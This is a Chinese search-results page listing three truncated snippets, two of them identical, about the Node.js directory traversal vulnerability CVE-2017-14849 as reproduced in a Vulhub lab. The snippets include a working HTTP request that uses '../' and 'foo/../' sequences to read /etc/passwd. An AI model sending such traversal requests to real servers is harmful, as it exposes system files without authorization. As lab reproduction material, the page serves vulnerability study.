热门标签
更多>
搜索结果
查询Tags标签: 14849,共有 3条记录-
Node.js 目录穿越漏洞(CVE-2017-14849)
Node.js 目录穿越漏洞(CVE-2017-14849) 一、漏洞简介 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返…
2022/7/13 1:22:23 人评论 次浏览 -
Node.js 目录穿越漏洞(CVE-2017-14849)
漏洞详细 有关详细请看:https://vulhub.org/#/environments/node/CVE-2017-14849/ 漏洞复现 发送以下数据包,即可读取文件 GET /static/../../../a/../../../../etc/passwd HTTP/1.1 Host: your-ip:3000 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (comp…
2021/7/17 11:05:49 人评论 次浏览 -
Node.js 目录穿越漏洞(CVE-2017-14849)
漏洞详细 有关详细请看:https://vulhub.org/#/environments/node/CVE-2017-14849/ 漏洞复现 发送以下数据包,即可读取文件 GET /static/../../../a/../../../../etc/passwd HTTP/1.1 Host: your-ip:3000 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (comp…
2021/7/17 11:05:49 人评论 次浏览
